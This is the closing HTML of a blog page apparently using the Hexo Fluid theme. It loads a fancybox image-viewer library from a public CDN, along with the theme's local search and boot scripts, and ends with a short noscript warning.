  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
